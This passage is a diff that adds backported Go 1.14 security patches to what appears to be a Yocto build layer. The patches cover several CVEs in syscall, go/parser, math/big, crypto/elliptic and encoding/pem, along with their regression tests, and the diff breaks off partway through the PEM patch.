+diff --git a/src/net/http/h2_bundle.go b/src/net/http/h2_bundle.go
+index 702fd5a..83f2a72 100644
+--- a/src/net/http/h2_bundle.go
++++ b/src/net/http/h2_bundle.go
+@@ -4293,7 +4293,15 @@ func (sc *http2serverConn) canonicalHeader(v string) string {
+ 		sc.canonHeader = make(map[string]string)
+ 	}
+ 	cv = CanonicalHeaderKey(v)
+-	sc.canonHeader[v] = cv
++	// maxCachedCanonicalHeaders is an arbitrarily-chosen limit on the number of
++	// entries in the canonHeader cache. This should be larger than the number
++	// of unique, uncommon header keys likely to be sent by the peer, while not
++	// so high as to permit unreaasonable memory usage if the peer sends an unbounded
++	// number of unique header keys.
++	const maxCachedCanonicalHeaders = 32
++	if len(sc.canonHeader) < maxCachedCanonicalHeaders {
++		sc.canonHeader[v] = cv
++	}
+ 	return cv
+ }
+ 
+diff --git a/src/vendor/modules.txt b/src/vendor/modules.txt
+index 669bd9b..1d67183 100644
+--- a/src/vendor/modules.txt
++++ b/src/vendor/modules.txt
+@@ -8,7 +8,7 @@ golang.org/x/crypto/curve25519
+ golang.org/x/crypto/hkdf
+ golang.org/x/crypto/internal/subtle
+ golang.org/x/crypto/poly1305
+-# golang.org/x/net v0.0.0-20210129194117-4acb7895a057
++# golang.org/x/net v0.0.0-20211209100217-a5309b321dca
+ ## explicit
+ golang.org/x/net/dns/dnsmessage
+ golang.org/x/net/http/httpguts
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch
new file mode 100644
index 0000000000..17cac7a5ba
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch
@@ -0,0 +1,83 @@
+From 9171c664e7af479aa26bc72f2e7cf4e69d8e0a6f Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 17 Jun 2022 10:22:47 +0530
+Subject: [PATCH] CVE-2021-44717
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/44a3fb49]
+CVE: CVE-2021-44717
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+syscall: fix ForkLock spurious close(0) on pipe failure
+Pipe (and therefore forkLockPipe) does not make any guarantees
+about the state of p after a failed Pipe(p). Avoid that assumption
+and the too-clever goto, so that we don't accidentally Close a real fd
+if the failed pipe leaves p[0] or p[1] set >= 0.
+
+Updates #50057
+Fixes CVE-2021-44717
+
+Change-Id: Iff8e19a6efbba0c73cc8b13ecfae381c87600bb4
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1291270
+Reviewed-by: Ian Lance Taylor <iant@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/370514
+Trust: Filippo Valsorda <filippo@golang.org>
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Alex Rakoczy <alex@golang.org>
+---
+ src/syscall/exec_unix.go | 20 ++++++--------------
+ 1 file changed, 6 insertions(+), 14 deletions(-)
+
+diff --git a/src/syscall/exec_unix.go b/src/syscall/exec_unix.go
+index b3798b6..b73782c 100644
+--- a/src/syscall/exec_unix.go
++++ b/src/syscall/exec_unix.go
+@@ -151,9 +151,6 @@ func forkExec(argv0 string, argv []string, attr *ProcAttr) (pid int, err error)
+ 		sys = &zeroSysProcAttr
+ 	}
+ 
+-	p[0] = -1
+-	p[1] = -1
+-
+ 	// Convert args to C form.
+ 	argv0p, err := BytePtrFromString(argv0)
+ 	if err != nil {
+@@ -194,14 +191,17 @@ func forkExec(argv0 string, argv []string, attr *ProcAttr) (pid int, err error)
+ 
+ 	// Allocate child status pipe close on exec.
+ 	if err = forkExecPipe(p[:]); err != nil {
+-		goto error
++		ForkLock.Unlock()
++		return 0, err
+ 	}
+ 
+ 	// Kick off child.
+ 	pid, err1 = forkAndExecInChild(argv0p, argvp, envvp, chroot, dir, attr, sys, p[1])
+ 	if err1 != 0 {
+-		err = Errno(err1)
+-		goto error
++		Close(p[0])
++		Close(p[1])
++		ForkLock.Unlock()
++		return 0, Errno(err1)
+ 	}
+ 	ForkLock.Unlock()
+ 
+@@ -228,14 +228,6 @@ func forkExec(argv0 string, argv []string, attr *ProcAttr) (pid int, err error)
+ 
+ 	// Read got EOF, so pipe closed on exec, so exec succeeded.
+ 	return pid, nil
+-
+-error:
+-	if p[0] >= 0 {
+-		Close(p[0])
+-		Close(p[1])
+-	}
+-	ForkLock.Unlock()
+-	return 0, err
+ }
+ 
+ // Combination of fork and exec, careful to be thread safe.
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch
new file mode 100644
index 0000000000..b2ab5d0669
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch
@@ -0,0 +1,357 @@
+From ba8788ebcead55e99e631c6a1157ad7b35535d11 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Wed, 15 Jun 2022 10:43:05 -0700
+Subject: [PATCH] [release-branch.go1.17] go/parser: limit recursion depth
+
+Limit nested parsing to 100,000, which prevents stack exhaustion when
+parsing deeply nested statements, types, and expressions. Also limit
+the scope depth to 1,000 during object resolution.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Fixes #53707
+Updates #53616
+Fixes CVE-2022-1962
+
+Change-Id: I4d7b86c1d75d0bf3c7af1fdea91582aa74272c64
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1491025
+Reviewed-by: Russ Cox <rsc@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit 6a856f08d58e4b6705c0c337d461c540c1235c83)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/417070
+Reviewed-by: Heschi Kreinick <heschi@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/ba8788ebcead55e99e631c6a1157ad7b35535d11]
+CVE: CVE-2022-1962
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/go/parser/interface.go   |  10 ++-
+ src/go/parser/parser.go      |  48 ++++++++--
+ src/go/parser/parser_test.go | 169 +++++++++++++++++++++++++++++++++++
+ 3 files changed, 220 insertions(+), 7 deletions(-)
+
+diff --git a/src/go/parser/interface.go b/src/go/parser/interface.go
+index 54f9d7b..537b327 100644
+--- a/src/go/parser/interface.go
++++ b/src/go/parser/interface.go
+@@ -92,8 +92,11 @@ func ParseFile(fset *token.FileSet, filename string, src interface{}, mode Mode)
+ 	defer func() {
+ 		if e := recover(); e != nil {
+ 			// resume same panic if it's not a bailout
+-			if _, ok := e.(bailout); !ok {
++			bail, ok := e.(bailout)
++			if !ok {
+ 				panic(e)
++			} else if bail.msg != "" {
++				p.errors.Add(p.file.Position(bail.pos), bail.msg)
+ 			}
+ 		}
+ 
+@@ -188,8 +191,11 @@ func ParseExprFrom(fset *token.FileSet, filename string, src interface{}, mode M
+ 	defer func() {
+ 		if e := recover(); e != nil {
+ 			// resume same panic if it's not a bailout
+-			if _, ok := e.(bailout); !ok {
++			bail, ok := e.(bailout)
++			if !ok {
+ 				panic(e)
++			} else if bail.msg != "" {
++				p.errors.Add(p.file.Position(bail.pos), bail.msg)
+ 			}
+ 		}
+ 		p.errors.Sort()
+diff --git a/src/go/parser/parser.go b/src/go/parser/parser.go
+index 31a7398..586fe90 100644
+--- a/src/go/parser/parser.go
++++ b/src/go/parser/parser.go
+@@ -64,6 +64,10 @@ type parser struct {
+ 	unresolved []*ast.Ident      // unresolved identifiers
+ 	imports    []*ast.ImportSpec // list of imports
+ 
++	// nestLev is used to track and limit the recursion depth
++	// during parsing.
++	nestLev int
++	
+ 	// Label scopes
+ 	// (maintained by open/close LabelScope)
+ 	labelScope  *ast.Scope     // label scope for current function
+@@ -236,6 +240,24 @@ func un(p *parser) {
+ 	p.printTrace(")")
+ }
+ 
++// maxNestLev is the deepest we're willing to recurse during parsing
++const maxNestLev int = 1e5
++
++func incNestLev(p *parser) *parser {
++	p.nestLev++
++	if p.nestLev > maxNestLev {
++		p.error(p.pos, "exceeded max nesting depth")
++		panic(bailout{})
++	}
++	return p
++}
++
++// decNestLev is used to track nesting depth during parsing to prevent stack exhaustion.
++// It is used along with incNestLev in a similar fashion to how un and trace are used.
++func decNestLev(p *parser) {
++	p.nestLev--
++}
++
+ // Advance to the next token.
+ func (p *parser) next0() {
+ 	// Because of one-token look-ahead, print the previous token
+@@ -348,8 +370,12 @@ func (p *parser) next() {
+ 	}
+ }
+ 
+-// A bailout panic is raised to indicate early termination.
+-type bailout struct{}
++// A bailout panic is raised to indicate early termination. pos and msg are
++// only populated when bailing out of object resolution.
++type bailout struct {
++	pos token.Pos
++	msg string
++}
+ 
+ func (p *parser) error(pos token.Pos, msg string) {
+ 	epos := p.file.Position(pos)
+@@ -1030,6 +1056,8 @@ func (p *parser) parseChanType() *ast.ChanType {
+ 
+ // If the result is an identifier, it is not resolved.
+ func (p *parser) tryIdentOrType() ast.Expr {
++	defer decNestLev(incNestLev(p))
++
+ 	switch p.tok {
+ 	case token.IDENT:
+ 		return p.parseTypeName()
+@@ -1609,7 +1637,13 @@ func (p *parser) parseBinaryExpr(lhs bool, prec1 int) ast.Expr {
+ 	}
+ 
+ 	x := p.parseUnaryExpr(lhs)
+-	for {
++	// We track the nesting here rather than at the entry for the function,
++	// since it can iteratively produce a nested output, and we want to
++	// limit how deep a structure we generate.
++	var n int
++	defer func() { p.nestLev -= n }()
++	for n = 1; ; n++ {
++		incNestLev(p)
+ 		op, oprec := p.tokPrec()
+ 		if oprec < prec1 {
+ 			return x
+@@ -1628,7 +1662,7 @@ func (p *parser) parseBinaryExpr(lhs bool, prec1 int) ast.Expr {
+ // The result may be a type or even a raw type ([...]int). Callers must
+ // check the result (using checkExpr or checkExprOrType), depending on
+ // context.
+-func (p *parser) parseExpr(lhs bool) ast.Expr {
++func (p *parser) parseExpr(lhs bool) ast.Expr {    
+ 	if p.trace {
+ 		defer un(trace(p, "Expression"))
+ 	}
+@@ -1899,6 +1933,8 @@ func (p *parser) parseIfHeader() (init ast.Stmt, cond ast.Expr) {
+ }
+ 
+ func (p *parser) parseIfStmt() *ast.IfStmt {
++	defer decNestLev(incNestLev(p))
++
+ 	if p.trace {
+ 		defer un(trace(p, "IfStmt"))
+ 	}
+@@ -2214,6 +2250,8 @@ func (p *parser) parseForStmt() ast.Stmt {
+ }
+ 
+ func (p *parser) parseStmt() (s ast.Stmt) {
++	defer decNestLev(incNestLev(p))
++
+ 	if p.trace {
+ 		defer un(trace(p, "Statement"))
+ 	}
+diff --git a/src/go/parser/parser_test.go b/src/go/parser/parser_test.go
+index 25a374e..37a6a2b 100644
+--- a/src/go/parser/parser_test.go
++++ b/src/go/parser/parser_test.go
+@@ -10,6 +10,7 @@ import (
+ 	"go/ast"
+ 	"go/token"
+ 	"os"
++	"runtime"
+ 	"strings"
+ 	"testing"
+ )
+@@ -569,3 +570,171 @@ type x int // comment
+ 		t.Errorf("got %q, want %q", comment, "// comment")
+ 	}
+ }
++
++var parseDepthTests = []struct {
++	name   string
++	format string
++	// multipler is used when a single statement may result in more than one
++	// change in the depth level, for instance "1+(..." produces a BinaryExpr
++	// followed by a UnaryExpr, which increments the depth twice. The test
++	// case comment explains which nodes are triggering the multiple depth
++	// changes.
++	parseMultiplier int
++	// scope is true if we should also test the statement for the resolver scope
++	// depth limit.
++	scope bool
++	// scopeMultiplier does the same as parseMultiplier, but for the scope
++	// depths.
++	scopeMultiplier int
++}{
++	// The format expands the part inside « » many times.
++	// A second set of brackets nested inside the first stops the repetition,
++	// so that for example «(«1»)» expands to (((...((((1))))...))).
++	{name: "array", format: "package main; var x «[1]»int"},
++	{name: "slice", format: "package main; var x «[]»int"},
++	{name: "struct", format: "package main; var x «struct { X «int» }»", scope: true},
++	{name: "pointer", format: "package main; var x «*»int"},
++	{name: "func", format: "package main; var x «func()»int", scope: true},
++	{name: "chan", format: "package main; var x «chan »int"},
++	{name: "chan2", format: "package main; var x «<-chan »int"},
++	{name: "interface", format: "package main; var x «interface { M() «int» }»", scope: true, scopeMultiplier: 2}, // Scopes: InterfaceType, FuncType
++	{name: "map", format: "package main; var x «map[int]»int"},
++	{name: "slicelit", format: "package main; var x = «[]any{«»}»", parseMultiplier: 2},             // Parser nodes: UnaryExpr, CompositeLit
++	{name: "arraylit", format: "package main; var x = «[1]any{«nil»}»", parseMultiplier: 2},         // Parser nodes: UnaryExpr, CompositeLit
++	{name: "structlit", format: "package main; var x = «struct{x any}{«nil»}»", parseMultiplier: 2}, // Parser nodes: UnaryExpr, CompositeLit
++	{name: "maplit", format: "package main; var x = «map[int]any{1:«nil»}»", parseMultiplier: 2},    // Parser nodes: CompositeLit, KeyValueExpr
++	{name: "dot", format: "package main; var x = «x.»x"},
++	{name: "index", format: "package main; var x = x«[1]»"},
++	{name: "slice", format: "package main; var x = x«[1:2]»"},
++	{name: "slice3", format: "package main; var x = x«[1:2:3]»"},
++	{name: "dottype", format: "package main; var x = x«.(any)»"},
++	{name: "callseq", format: "package main; var x = x«()»"},
++	{name: "methseq", format: "package main; var x = x«.m()»", parseMultiplier: 2}, // Parser nodes: SelectorExpr, CallExpr
++	{name: "binary", format: "package main; var x = «1+»1"},
++	{name: "binaryparen", format: "package main; var x = «1+(«1»)»", parseMultiplier: 2}, // Parser nodes: BinaryExpr, ParenExpr
++	{name: "unary", format: "package main; var x = «^»1"},
++	{name: "addr", format: "package main; var x = «& »x"},
++	{name: "star", format: "package main; var x = «*»x"},
++	{name: "recv", format: "package main; var x = «<-»x"},
++	{name: "call", format: "package main; var x = «f(«1»)»", parseMultiplier: 2},    // Parser nodes: Ident, CallExpr
++	{name: "conv", format: "package main; var x = «(*T)(«1»)»", parseMultiplier: 2}, // Parser nodes: ParenExpr, CallExpr
++	{name: "label", format: "package main; func main() { «Label:» }"},
++	{name: "if", format: "package main; func main() { «if true { «» }»}", parseMultiplier: 2, scope: true, scopeMultiplier: 2}, // Parser nodes: IfStmt, BlockStmt. Scopes: IfStmt, BlockStmt
++	{name: "ifelse", format: "package main; func main() { «if true {} else » {} }", scope: true},
++	{name: "switch", format: "package main; func main() { «switch { default: «» }»}", scope: true, scopeMultiplier: 2},               // Scopes: TypeSwitchStmt, CaseClause
++	{name: "typeswitch", format: "package main; func main() { «switch x.(type) { default: «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: TypeSwitchStmt, CaseClause
++	{name: "for0", format: "package main; func main() { «for { «» }» }", scope: true, scopeMultiplier: 2},                            // Scopes: ForStmt, BlockStmt
++	{name: "for1", format: "package main; func main() { «for x { «» }» }", scope: true, scopeMultiplier: 2},                          // Scopes: ForStmt, BlockStmt
++	{name: "for3", format: "package main; func main() { «for f(); g(); h() { «» }» }", scope: true, scopeMultiplier: 2},              // Scopes: ForStmt, BlockStmt
++	{name: "forrange0", format: "package main; func main() { «for range x { «» }» }", scope: true, scopeMultiplier: 2},               // Scopes: RangeStmt, BlockStmt
++	{name: "forrange1", format: "package main; func main() { «for x = range z { «» }» }", scope: true, scopeMultiplier: 2},           // Scopes: RangeStmt, BlockStmt
++	{name: "forrange2", format: "package main; func main() { «for x, y = range z { «» }» }", scope: true, scopeMultiplier: 2},        // Scopes: RangeStmt, BlockStmt
++	{name: "go", format: "package main; func main() { «go func() { «» }()» }", parseMultiplier: 2, scope: true},                      // Parser nodes: GoStmt, FuncLit
++	{name: "defer", format: "package main; func main() { «defer func() { «» }()» }", parseMultiplier: 2, scope: true},                // Parser nodes: DeferStmt, FuncLit
++	{name: "select", format: "package main; func main() { «select { default: «» }» }", scope: true},
++}
++
++// split splits pre«mid»post into pre, mid, post.
++// If the string does not have that form, split returns x, "", "".
++func split(x string) (pre, mid, post string) {
++	start, end := strings.Index(x, "«"), strings.LastIndex(x, "»")
++	if start < 0 || end < 0 {
++		return x, "", ""
++	}
++	return x[:start], x[start+len("«") : end], x[end+len("»"):]
++}
++
++func TestParseDepthLimit(t *testing.T) {
++	if runtime.GOARCH == "wasm" {
++		t.Skip("causes call stack exhaustion on js/wasm")
++	}
++	for _, tt := range parseDepthTests {
++		for _, size := range []string{"small", "big"} {
++			t.Run(tt.name+"/"+size, func(t *testing.T) {
++				n := maxNestLev + 1
++				if tt.parseMultiplier > 0 {
++					n /= tt.parseMultiplier
++				}
++				if size == "small" {
++					// Decrease the number of statements by 10, in order to check
++					// that we do not fail when under the limit. 10 is used to
++					// provide some wiggle room for cases where the surrounding
++					// scaffolding syntax adds some noise to the depth that changes
++					// on a per testcase basis.
++					n -= 10
++				}
++
++				pre, mid, post := split(tt.format)
++				if strings.Contains(mid, "«") {
++					left, base, right := split(mid)
++					mid = strings.Repeat(left, n) + base + strings.Repeat(right, n)
++				} else {
++					mid = strings.Repeat(mid, n)
++				}
++				input := pre + mid + post
++
++				fset := token.NewFileSet()
++				_, err := ParseFile(fset, "", input, ParseComments|SkipObjectResolution)
++				if size == "small" {
++					if err != nil {
++						t.Errorf("ParseFile(...): %v (want success)", err)
++					}
++				} else {
++					expected := "exceeded max nesting depth"
++					if err == nil || !strings.HasSuffix(err.Error(), expected) {
++						t.Errorf("ParseFile(...) = _, %v, want %q", err, expected)
++					}
++				}
++			})
++		}
++	}
++}
++
++func TestScopeDepthLimit(t *testing.T) {
++	if runtime.GOARCH == "wasm" {
++		t.Skip("causes call stack exhaustion on js/wasm")
++	}
++	for _, tt := range parseDepthTests {
++		if !tt.scope {
++			continue
++		}
++		for _, size := range []string{"small", "big"} {
++			t.Run(tt.name+"/"+size, func(t *testing.T) {
++				n := maxScopeDepth + 1
++				if tt.scopeMultiplier > 0 {
++					n /= tt.scopeMultiplier
++				}
++				if size == "small" {
++					// Decrease the number of statements by 10, in order to check
++					// that we do not fail when under the limit. 10 is used to
++					// provide some wiggle room for cases where the surrounding
++					// scaffolding syntax adds some noise to the depth that changes
++					// on a per testcase basis.
++					n -= 10
++				}
++
++				pre, mid, post := split(tt.format)
++				if strings.Contains(mid, "«") {
++					left, base, right := split(mid)
++					mid = strings.Repeat(left, n) + base + strings.Repeat(right, n)
++				} else {
++					mid = strings.Repeat(mid, n)
++				}
++				input := pre + mid + post
++
++				fset := token.NewFileSet()
++				_, err := ParseFile(fset, "", input, DeclarationErrors)
++				if size == "small" {
++					if err != nil {
++						t.Errorf("ParseFile(...): %v (want success)", err)
++					}
++				} else {
++					expected := "exceeded max scope depth during object resolution"
++					if err == nil || !strings.HasSuffix(err.Error(), expected) {
++						t.Errorf("ParseFile(...) = _, %v, want %q", err, expected)
++					}
++				}
++			})
++		}
++	}
++}
+-- 
+2.30.2
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch
new file mode 100644
index 0000000000..f0daee3624
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch
@@ -0,0 +1,50 @@
+From 70882eedccac803ddcf1c3215e0ae8fd59847e39 Mon Sep 17 00:00:00 2001
+From: Katie Hockman <katie@golang.org>
+Date: Sat, 26 Feb 2022 20:03:38 +0000
+Subject: [PATCH] [release-branch.go1.16] math/big: prevent overflow in
+ (*Rat).SetString
+
+Credit to rsc@ for the original patch.
+
+Thanks to the OSS-Fuzz project for discovering this
+issue and to Emmanuel Odeke (@odeke_et) for reporting it.
+
+Updates #50699
+Fixes #50700
+Fixes CVE-2022-23772
+---
+ src/math/big/ratconv.go      | 5 +++++
+ src/math/big/ratconv_test.go | 1 +
+ 2 files changed, 6 insertions(+)
+
+diff --git a/src/math/big/ratconv.go b/src/math/big/ratconv.go
+index 941139e..e8cbdbe 100644
+--- a/src/math/big/ratconv.go
++++ b/src/math/big/ratconv.go
+@@ -168,6 +168,11 @@ func (z *Rat) SetString(s string) (*Rat, bool) {
+ 		n := exp5
+ 		if n < 0 {
+ 			n = -n
++			if n < 0 {
++				// This can occur if -n overflows. -(-1 << 63) would become
++				// -1 << 63, which is still negative.
++				return nil, false
++			}
+ 		}
+ 		pow5 := z.b.abs.expNN(natFive, nat(nil).setWord(Word(n)), nil) // use underlying array of z.b.abs
+ 		if exp5 > 0 {
+diff --git a/src/math/big/ratconv_test.go b/src/math/big/ratconv_test.go
+index ba0d1ba..b820df4 100644
+--- a/src/math/big/ratconv_test.go
++++ b/src/math/big/ratconv_test.go
+@@ -104,6 +104,7 @@ var setStringTests = []StringTest{
+ 	{in: "4/3/"},
+ 	{in: "4/3."},
+ 	{in: "4/"},
++	{in: "13e-9223372036854775808"}, // CVE-2022-23772
+ 
+ 	// valid
+ 	{"0", "0", true},
+-- 
+2.17.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch
new file mode 100644
index 0000000000..772acdcbf6
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch
@@ -0,0 +1,142 @@
+From 5b376a209d1c61e10847e062d78c4b1aa90dff0c Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Sat, 26 Feb 2022 10:40:57 +0000
+Subject: [PATCH] crypto/elliptic: make IsOnCurve return false for invalid
+
+ field elements
+
+Updates #50974
+Fixes #50977
+Fixes CVE-2022-23806
+
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+
+---
+ src/crypto/elliptic/elliptic.go      |  6 +++
+ src/crypto/elliptic/elliptic_test.go | 81 ++++++++++++++++++++++++++++
+ src/crypto/elliptic/p224.go          |  6 +++
+ 3 files changed, 93 insertions(+)
+
+diff --git a/src/crypto/elliptic/elliptic.go b/src/crypto/elliptic/elliptic.go
+index e2f71cd..bd574a4 100644
+--- a/src/crypto/elliptic/elliptic.go
++++ b/src/crypto/elliptic/elliptic.go
+@@ -53,6 +53,12 @@ func (curve *CurveParams) Params() *CurveParams {
+ }
+ 
+ func (curve *CurveParams) IsOnCurve(x, y *big.Int) bool {
++
++	if x.Sign() < 0 || x.Cmp(curve.P) >= 0 ||
++		y.Sign() < 0 || y.Cmp(curve.P) >= 0 {
++		return false
++	}
++
+ 	// y² = x³ - 3x + b
+ 	y2 := new(big.Int).Mul(y, y)
+ 	y2.Mod(y2, curve.P)
+diff --git a/src/crypto/elliptic/elliptic_test.go b/src/crypto/elliptic/elliptic_test.go
+index 09c5483..b13a620 100644
+--- a/src/crypto/elliptic/elliptic_test.go
++++ b/src/crypto/elliptic/elliptic_test.go
+@@ -628,3 +628,84 @@ func TestUnmarshalToLargeCoordinates(t *testing.T) {
+ 		t.Errorf("Unmarshal accepts invalid Y coordinate")
+ 	}
+ }
++
++func testAllCurves(t *testing.T, f func(*testing.T, Curve)) {
++	tests := []struct {
++		name  string
++		curve Curve
++	}{
++		{"P256", P256()},
++		{"P256/Params", P256().Params()},
++		{"P224", P224()},
++		{"P224/Params", P224().Params()},
++		{"P384", P384()},
++		{"P384/Params", P384().Params()},
++		{"P521", P521()},
++		{"P521/Params", P521().Params()},
++	}
++	if testing.Short() {
++		tests = tests[:1]
++	}
++	for _, test := range tests {
++		curve := test.curve
++		t.Run(test.name, func(t *testing.T) {
++			t.Parallel()
++			f(t, curve)
++		})
++	}
++}
++
++// TestInvalidCoordinates tests big.Int values that are not valid field elements
++// (negative or bigger than P). They are expected to return false from
++// IsOnCurve, all other behavior is undefined.
++func TestInvalidCoordinates(t *testing.T) {
++	testAllCurves(t, testInvalidCoordinates)
++}
++
++func testInvalidCoordinates(t *testing.T, curve Curve) {
++	checkIsOnCurveFalse := func(name string, x, y *big.Int) {
++		if curve.IsOnCurve(x, y) {
++			t.Errorf("IsOnCurve(%s) unexpectedly returned true", name)
++		}
++	}
++
++	p := curve.Params().P
++	_, x, y, _ := GenerateKey(curve, rand.Reader)
++	xx, yy := new(big.Int), new(big.Int)
++
++	// Check if the sign is getting dropped.
++	xx.Neg(x)
++	checkIsOnCurveFalse("-x, y", xx, y)
++	yy.Neg(y)
++	checkIsOnCurveFalse("x, -y", x, yy)
++
++	// Check if negative values are reduced modulo P.
++	xx.Sub(x, p)
++	checkIsOnCurveFalse("x-P, y", xx, y)
++	yy.Sub(y, p)
++	checkIsOnCurveFalse("x, y-P", x, yy)
++
++	// Check if positive values are reduced modulo P.
++	xx.Add(x, p)
++	checkIsOnCurveFalse("x+P, y", xx, y)
++	yy.Add(y, p)
++	checkIsOnCurveFalse("x, y+P", x, yy)
++
++	// Check if the overflow is dropped.
++	xx.Add(x, new(big.Int).Lsh(big.NewInt(1), 535))
++	checkIsOnCurveFalse("x+2�³�, y", xx, y)
++	yy.Add(y, new(big.Int).Lsh(big.NewInt(1), 535))
++	checkIsOnCurveFalse("x, y+2�³�", x, yy)
++
++	// Check if P is treated like zero (if possible).
++	// y^2 = x^3 - 3x + B
++	// y = mod_sqrt(x^3 - 3x + B)
++	// y = mod_sqrt(B) if x = 0
++	// If there is no modsqrt, there is no point with x = 0, can't test x = P.
++	if yy := new(big.Int).ModSqrt(curve.Params().B, p); yy != nil {
++		if !curve.IsOnCurve(big.NewInt(0), yy) {
++			t.Fatal("(0, mod_sqrt(B)) is not on the curve?")
++		}
++		checkIsOnCurveFalse("P, y", p, yy)
++	}
++}
+diff --git a/src/crypto/elliptic/p224.go b/src/crypto/elliptic/p224.go
+index 8c76021..f1bfd7e 100644
+--- a/src/crypto/elliptic/p224.go
++++ b/src/crypto/elliptic/p224.go
+@@ -48,6 +48,12 @@ func (curve p224Curve) Params() *CurveParams {
+ }
+ 
+ func (curve p224Curve) IsOnCurve(bigX, bigY *big.Int) bool {
++
++	if bigX.Sign() < 0 || bigX.Cmp(curve.P) >= 0 ||
++		bigY.Sign() < 0 || bigY.Cmp(curve.P) >= 0 {
++		return false
++	}
++
+ 	var x, y p224FieldElement
+ 	p224FromBig(&x, bigX)
+ 	p224FromBig(&y, bigY)
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch
new file mode 100644
index 0000000000..4bc012be21
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch
@@ -0,0 +1,271 @@
+From 1eb931d60a24501a9668e5cb4647593e19115507 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 17 Jun 2022 12:22:53 +0530
+Subject: [PATCH] CVE-2022-24675
+
+Upstream-Status: Backport [https://go-review.googlesource.com/c/go/+/399816/]
+CVE: CVE-2022-24675
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/encoding/pem/pem.go      | 174 +++++++++++++++--------------------
+ src/encoding/pem/pem_test.go |  28 +++++-
+ 2 files changed, 101 insertions(+), 101 deletions(-)
+
+diff --git a/src/encoding/pem/pem.go b/src/encoding/pem/pem.go
+index a7272da..1bee1c1 100644
+--- a/src/encoding/pem/pem.go
++++ b/src/encoding/pem/pem.go
+@@ -87,123 +87,97 @@ func Decode(data []byte) (p *Block, rest []byte) {
+ 	// pemStart begins with a newline. However, at the very beginning of
+ 	// the byte array, we'll accept the start string without it.
+ 	rest = data
+-	if bytes.HasPrefix(data, pemStart[1:]) {
+-		rest = rest[len(pemStart)-1 : len(data)]
+-	} else if i := bytes.Index(data, pemStart); i >= 0 {
+-		rest = rest[i+len(pemStart) : len(data)]
+-	} else {
+-		return nil, data
+-	}
+-
+-	typeLine, rest := getLine(rest)
+-	if !bytes.HasSuffix(typeLine, pemEndOfLine) {
+-		return decodeError(data, rest)
+-	}
+-	typeLine = typeLine[0 : len(typeLine)-len(pemEndOfLine)]
+-
+-	p = &Block{
+-		Headers: make(map[string]string),
+-		Type:    string(typeLine),
+-	}
+-
+ 	for {
+-		// This loop terminates because getLine's second result is
+-		// always smaller than its argument.
+-		if len(rest) == 0 {
++		if bytes.HasPrefix(rest, pemStart[1:]) {
++			rest = rest[len(pemStart)-1:]
++		} else if i := bytes.Index(rest, pemStart); i >= 0 {
++			rest = rest[i+len(pemStart) : len(rest)]
++		} else {
+ 			return nil, data
+ 		}
+-		line, next := getLine(rest)
+ 
+-		i := bytes.IndexByte(line, ':')
+-		if i == -1 {
+-			break
++		var typeLine []byte
++		typeLine, rest = getLine(rest)
++		if !bytes.HasSuffix(typeLine, pemEndOfLine) {
++			continue
+ 		}
++		typeLine = typeLine[0 : len(typeLine)-len(pemEndOfLine)]
+ 
+-		// TODO(agl): need to cope with values that spread across lines.
+-		key, val := line[:i], line[i+1:]
+-		key = bytes.TrimSpace(key)
+-		val = bytes.TrimSpace(val)
+-		p.Headers[string(key)] = string(val)
+-		rest = next
+-	}
++		p = &Block{
++			Headers: make(map[string]string),
++			Type:    string(typeLine),
++		}
+ 
+-	var endIndex, endTrailerIndex int
++		for {
++			// This loop terminates because getLine's second result is
++			// always smaller than its argument.
++			if len(rest) == 0 {
++				return nil, data
++			}
++			line, next := getLine(rest)
+ 
+-	// If there were no headers, the END line might occur
+-	// immediately, without a leading newline.
+-	if len(p.Headers) == 0 && bytes.HasPrefix(rest, pemEnd[1:]) {
+-		endIndex = 0
+-		endTrailerIndex = len(pemEnd) - 1
+-	} else {
+-		endIndex = bytes.Index(rest, pemEnd)
+-		endTrailerIndex = endIndex + len(pemEnd)
+-	}
++			i := bytes.IndexByte(line, ':')
++			if i == -1 {
++				break
++			}
+ 
+-	if endIndex < 0 {
+-		return decodeError(data, rest)
+-	}
++			// TODO(agl): need to cope with values that spread across lines.
++			key, val := line[:i], line[i+1:]
